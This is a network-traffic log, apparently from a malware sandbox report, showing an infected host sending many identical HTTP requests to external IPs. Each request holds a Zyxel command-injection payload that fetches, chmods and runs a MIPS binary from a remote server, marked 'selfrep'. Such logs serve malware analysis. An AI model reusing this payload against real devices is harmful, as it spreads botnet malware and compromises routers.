                                                Jan 29, 2024 07:07:55.488888025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6074192.168.2.235461066.223.25.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488933086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6075192.168.2.2345730116.159.117.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488981962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6076192.168.2.2346900151.157.120.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489017010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6077192.168.2.235869082.81.64.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489048958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6078192.168.2.2355112166.135.252.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489092112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6079192.168.2.2337694158.25.136.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489126921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6080192.168.2.235443283.127.232.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489176989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6081192.168.2.235233262.7.31.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489212990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6082192.168.2.2337244170.239.113.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489249945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6083192.168.2.2353888220.39.218.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489259005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6084192.168.2.2333286190.124.101.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489290953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6085192.168.2.2338838144.206.248.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489315033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6086192.168.2.234320686.114.5.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489377022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6087192.168.2.234826618.210.181.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489442110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6088192.168.2.2335884161.132.164.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489481926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6089192.168.2.23337041.143.126.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489506006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6090192.168.2.2340958206.40.202.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489554882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6091192.168.2.2336040118.30.206.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489599943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6092192.168.2.235398054.150.28.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489660025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6093192.168.2.235727448.52.195.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489703894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6094192.168.2.2335108169.26.40.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489718914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6095192.168.2.2332778195.27.202.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489751101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6096192.168.2.233975081.5.85.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489788055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6097192.168.2.233976871.102.192.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489850998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6098192.168.2.234035440.8.218.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489871979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6099192.168.2.2341574133.175.18.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489918947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6100192.168.2.234917273.236.248.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.489953041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6101192.168.2.2358092181.51.198.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490017891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6102192.168.2.235253044.199.57.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490036011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6103192.168.2.2348830216.109.29.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490083933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6104192.168.2.236010480.24.133.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490084887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6105192.168.2.234665061.140.44.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490128040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6106192.168.2.2335182105.119.46.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490158081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6107192.168.2.234767058.3.253.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490205050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6108192.168.2.2337778141.153.180.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490248919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6109192.168.2.2357650171.59.35.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490272999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6110192.168.2.2340654216.74.93.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490320921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6111192.168.2.2337054140.82.179.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490345001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6112192.168.2.235045678.158.77.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490372896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6113192.168.2.23593628.188.65.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490402937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6114192.168.2.2350404172.168.211.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490438938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6115192.168.2.236004671.13.97.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490493059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6116192.168.2.235560414.190.210.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490556955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6117192.168.2.2356538160.41.224.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490566015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6118192.168.2.2353474197.168.28.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490602016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6119192.168.2.2360122115.222.245.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490643024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6120192.168.2.236089863.188.54.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490699053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6121192.168.2.2346196153.228.14.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490761995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6122192.168.2.234666697.106.19.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490783930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6123192.168.2.2359994170.1.70.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490808964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6124192.168.2.235618817.122.7.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490873098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6125192.168.2.2358746209.1.14.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490942001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6126192.168.2.2346510177.207.39.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.490979910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6127192.168.2.235119668.166.164.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491004944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6128192.168.2.2339794222.8.68.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491034985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6129192.168.2.233848883.183.37.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491095066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6130192.168.2.2358296136.68.70.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491127968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6131192.168.2.2353824217.45.233.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491194010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6132192.168.2.2338798123.25.65.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491200924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6133192.168.2.2352948181.231.62.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491230011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6134192.168.2.234597860.29.150.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491281033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6135192.168.2.234412892.169.154.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491316080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6136192.168.2.2360826116.49.251.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491375923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6137192.168.2.2344454175.149.18.15443
                                                TimestampBytes transferredDirectionData
